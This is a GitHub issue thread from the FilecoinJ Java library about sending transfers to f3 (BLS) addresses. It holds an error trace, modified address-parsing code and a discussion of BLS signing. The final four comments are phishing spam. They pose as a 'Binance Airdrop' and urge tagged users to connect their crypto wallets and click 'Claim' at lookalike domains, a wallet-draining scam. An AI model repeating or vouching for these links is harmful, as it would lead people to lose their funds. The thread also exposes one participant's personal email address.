### ISSUE TITLE
转账支持BLS Public Key Address  (f3开头的地址)

### ISSUE THREAD

**Issue by pipepi** [xuehongyang/FilecoinJ#9]
# 我修改后，转账失败。不知道什么地方错了。用的是ganache-filecoin 做开发用的api服务。
- 报错信息
```
Exception in thread "main" com.filecoinj.exception.SendException: send error {"id":1,"jsonrpc":"2.0","error":{"message":"Cannot read property 'value' of undefined","stack":"TypeError: Cannot read property 'value' of undefined\n    at sigCacheKey (C:\\Program Files\\WindowsApps\\GanacheUI_2.6.0.0_x64__5dg5pnz03psnj\\app\\resources\\static\\node\\node_modules\\@ganache\\filecoin\\dist\\node\\ganache-filecoin.min.js:2:804447)\n    at verifyMessageSignature (C:\\Program Files\\WindowsApps\\GanacheUI_2.6.0.0_x64__5dg5pnz03psnj\\app\\resources\\static\\node\\node_modules\\@ganache\\filecoin\\dist\\node\\ganache-filecoin.min.js:2:804531)\n    at Object.checkMessage (C:\\Program Files\\WindowsApps\\GanacheUI_2.6.0.0_x64__5dg5pnz03psnj\\app\\resources\\static\\node\\node_modules\\@ganache\\filecoin\\dist\\node\\ganache-filecoin.min.js:2:805672)\n    at Blockchain.pushSigned (C:\\Program Files\\WindowsApps\\GanacheUI_2.6.0.0_x64__5dg5pnz03psnj\\app\\resources\\static\\node\\node_modules\\@ganache\\filecoin\\dist\\node\\ganache-filecoin.min.js:2:778470)\n    at FilecoinApi.Filecoin.MpoolPush (C:\\Program Files\\WindowsApps\\GanacheUI_2.6.0.0_x64__5dg5pnz03psnj\\app\\resources\\static\\node\\node_modules\\@ganache\\filecoin\\dist\\node\\ganache-filecoin.min.js:2:764697)\n    at C:\\Program Files\\WindowsApps\\GanacheUI_2.6.0.0_x64__5dg5pnz03psnj\\app\\resources\\static\\node\\node_modules\\ganache\\dist\\node\\ganache.min.js:2:3790243\n    at RequestCoordinator.<anonymous> (C:\\Program Files\\WindowsApps\\GanacheUI_2.6.0.0_x64__5dg5pnz03psnj\\app\\resources\\static\\node\\node_modules\\ganache\\dist\\node\\ganache.min.js:2:3790075)\n    at C:\\Program Files\\WindowsApps\\GanacheUI_2.6.0.0_x64__5dg5pnz03psnj\\app\\resources\\static\\node\\node_modules\\ganache\\dist\\node\\ganache.min.js:2:3790310\n    at new Promise (<anonymous>)\n    at RequestCoordinator.queue (C:\\Program Files\\WindowsApps\\GanacheUI_2.6.0.0_x64__5dg5pnz03psnj\\app\\resources\\static\\node\\node_modules\\ganache\\dist\\node\\ganache.min.js:2:3790173)","code":-32700}}
```
- AddressUtil.java修改后代码
```
package com.filecoinj.utils;

import cn.hutool.core.codec.Base32;
import cn.hutool.core.util.StrUtil;
import com.filecoinj.exception.AddressException;
import com.filecoinj.model.Address;

public class AddressUtil {
    /**
     * secp256k1地址字节长度
     */
    private final static int addressLength_1 = 21;
    // private final static int addressLength_1 = 21;
    private final static int addressLength_3 = 43;

    public static Address initAddress(String addressStr) throws AddressException {
        if (StrUtil.isBlank(addressStr)){
            throw new NullPointerException("addressStr 参数不能为空");
        }
        //去掉拼接的前两位
        String substring = addressStr.substring(2);
        //获取type
        String typeStr = addressStr.substring(1, 2);
        //获取网络类型
        String network = addressStr.substring(0,1);
        int type = Integer.parseInt(typeStr);
        if (type != 1 && type !=2 && type != 3){
            throw new AddressException("错误的地址类型");
        }

        int addrLen = addressLength_1;
        if(type==3){
            addrLen = addressLength_3;
        }

        byte[] addressBytes = new byte[addrLen];

        // f099
        // f1abjxfbp274xpdqcpuaykwkfb43omjotacm2p3za
        // f2plku564ddywnmb5b2ky7dhk4mb6uacsxuuev3pi
        // f3tfhgkbq6h55fqhumadd7wvogx3bbhgm3ifg6mk6hq35ob3fex2uei7hfbo2nwqkzudjzjidmshxpvo3ja4iq
        switch (type){
            case 1:
                //secp256k1 地址类型
                addressBytes[0] = (byte) type;
                break;
            case 2:
            case 3:
                // throw new AddressException("暂不支持的地址类型");
                addressBytes[0] = (byte) type;
                break;
            default:
                throw new AddressException("错误地址类型");
        }

        System.arraycopy(Base32.decode(substring), 0, addressBytes, 1, addrLen-1);
        return Address.builder().address(addressStr)
                .bytes(addressBytes)
                .network(network).build();

    }
}

```

**Comment by 790228724** [comment]
F3 address does not support the use of blake2b algorithm library, you need to use the bls algorithm library

**Comment by ganboy-blog** [comment]
@790228724 

> F3地址不支持使用blake2b算法库，需要使用bls算法库

How do I sign if I transfer from f1 to f3 address?

**Comment by 790228724** [comment]
Is there any relevant demo or information?

**Comment by 790228724** [comment]
Is there any relevant demo or information?


有没有相关的demo或者资料？




------------------&nbsp;原始邮件&nbsp;------------------
发件人: "@***@***.***&gt;; 
发送时间: 2022年1月11日(星期二) 晚上6:16
收件人: ***@***.***&gt;; 
抄送: ***@***.***&gt;; ***@***.***&gt;; 
主题: Re: [juzi-code/FilecoinJ] 转账支持BLS Public Key Address  (f3开头的地址) (#9)





 
@790228724
  
F3地址不支持使用blake2b算法库，需要使用bls算法库
  
How do I sign if I transfer from f1 to f3 address?
 
—
Reply to this email directly, view it on GitHub, or unsubscribe.
Triage notifications on the go with GitHub Mobile for iOS or Android.

**Comment by jc0803kevin** [comment]
> @790228724
> 
> > F3地址不支持使用blake2b算法库，需要使用bls算法库
> 
> How do I sign if I transfer from f1 to f3 address?

这个我知道呀

**Comment by jc0803kevin** [comment]
那大佬，你知道如何使用Java 进行bls 的签名么？谢谢！




------------------&nbsp;原始邮件&nbsp;------------------
发件人:                                                                                                                        "juzi-code/FilecoinJ"                                                                                    ***@***.***&gt;;
发送时间:&nbsp;2022年1月11日(星期二) 晚上6:16
***@***.***&gt;;
***@***.******@***.***&gt;;
主题:&nbsp;Re: [juzi-code/FilecoinJ] 转账支持BLS Public Key Address  (f3开头的地址) (#9)





 
@790228724
  
F3地址不支持使用blake2b算法库，需要使用bls算法库
  
How do I sign if I transfer from f1 to f3 address?
 
—
Reply to this email directly, view it on GitHub, or unsubscribe.
Triage notifications on the go with GitHub Mobile for iOS or Android.

**Comment by ganboy-blog** [comment]
It seems that Java cannot implement the BLS algorithm. Do you know how to sign and send the transaction from F1 to F3 address, and can you provide relevant demos or materials? thank you!

**Comment by ganboy-blog** [comment]
> 那个大佬，你知道如何使用Java进行bls的签名么？谢谢！
> […](#)
> ------------------&nbsp;原始邮件&nbsp;------------------ 发件人: "juzi-code/FilecoinJ" ***@***.***&gt;; 发送时间:&nbsp;2022年1月11日(星期二) 晚上6:16 ***@***.***&gt;; ***@***.******@***.***&gt;; 主题:&nbsp;Re: [juzi-code/FilecoinJ] 转账支持BLS Public Key Address (f3开头的地址) (#9) @790228724 F3地址不支持使用blake2b算法库，需要使用bls算法库 How do I sign if I transfer from f1 to f3 address? — Reply to this email directly, view it on GitHub, or unsubscribe. Triage notifications on the go with GitHub Mobile for iOS or Android. You are receiving this because you commented.Message ID: ***@***.***&gt;

It seems that Java cannot implement the BLS algorithm. Do you know how to sign and send the transaction from F1 to F3 address, and can you provide relevant demos or materials? thank you!

**Comment by jc0803kevin** [comment]
可以，把邮箱发给我吧，




------------------&nbsp;原始邮件&nbsp;------------------
发件人:                                                                                                                        "juzi-code/FilecoinJ"                                                                                    ***@***.***&gt;;
发送时间:&nbsp;2022年1月12日(星期三) 下午4:54
***@***.***&gt;;
***@***.******@***.***&gt;;
主题:&nbsp;Re: [juzi-code/FilecoinJ] 转账支持BLS Public Key Address  (f3开头的地址) (#9)





 
It seems that Java cannot implement the BLS algorithm. Do you know how to sign and send the transaction from F1 to F3 address, and can you provide relevant demos or materials? thank you!
 
—
Reply to this email directly, view it on GitHub, or unsubscribe.
Triage notifications on the go with GitHub Mobile for iOS or Android.

**Comment by ganboy-blog** [comment]
> 可以，把邮箱发给我吧，
> […](#)
> ------------------&nbsp;原始邮件&nbsp;------------------ 发件人: "juzi-code/FilecoinJ" ***@***.***&gt;; 发送时间:&nbsp;2022年1月12日(星期三) 下午4:54 ***@***.***&gt;; ***@***.******@***.***&gt;; 主题:&nbsp;Re: [juzi-code/FilecoinJ] 转账支持BLS Public Key Address (f3开头的地址) (#9) It seems that Java cannot implement the BLS algorithm. Do you know how to sign and send the transaction from F1 to F3 address, and can you provide relevant demos or materials? thank you! — Reply to this email directly, view it on GitHub, or unsubscribe. Triage notifications on the go with GitHub Mobile for iOS or Android. You are receiving this because you commented.Message ID: ***@***.***&gt;

GMAIL EMAIL : ganhua.office@gmail.com，Thank you, you are a good man!

**Comment by knofte** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @ffynn, @b68h4, @Hadesonly, @semyon-dev, @iam4x, @Los-had, @goodcopybruh, @dominickK963, @bydemir3, @marsoln, @xaaa0035, @UmaGawt, @qbig, @koradiyakaushal, @httpservlet, @nftgeek, @thang-tran-tt, @peng1027, @smhmayboudi, @c2s, @RexWarfang, @bageda, @Icarus9913, @monkeybape, @legua25, @nfsc-tommy, @Jinada556, @gandhije, @al8n, @RickCastle2018, @ahsentekdemir, @jehamanantonius, @canab, @renaissancelab, @ranuranjika, @Malloka, @dorucioclea, @MSALEEM0777, @sinochem-gavin, @pypypy123, @jontsai, @gavinsun2021, @bynightflow, @VadimMalykhin, @ViralTaco, @jinpeicomp, @guiferpa, @TherRichard, @richardsonjf, @yv

**Comment by knofte** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @Freedom188, @dasibcryptoidology, @andreamorosati, @lightface2021, @tomlelouch, @moumc, @aihamhasan, @TyreeZhao, @nand16041987, @Bosandi, @qiaokeke, @tz792322620, @Dernity26695, @Maxalash, @milad237, @Higrorr, @durango, @flavinlouise, @DUO1510, @AndyAdolf2100, @mentalrob, @marpme, @morpheus-blockchain, @jingbof, @kevinsegal, @clouds277, @leopard627, @remyz17, @zcong1993, @marcelobns, @Gabriel25130804, @famasoon, @kevin-44, @sinaLong258, @x568533, @manuelnucci, @Claude-Mantis, @p7n8zk, @Kh0anh, @developerasun, @plusv, @Klimovich77, @horacio, @midtur, @davidalbela, @Vitor-Almeida, @fooock, @BitCashCF, @Kcjay2068, @moneyhere

**Comment by knofte** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by drfabiocastro** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @tildaw27, @shunyue1320, @BiscuitCoder, @imtipi, @yzevm, @scobru, @Winter-J-27
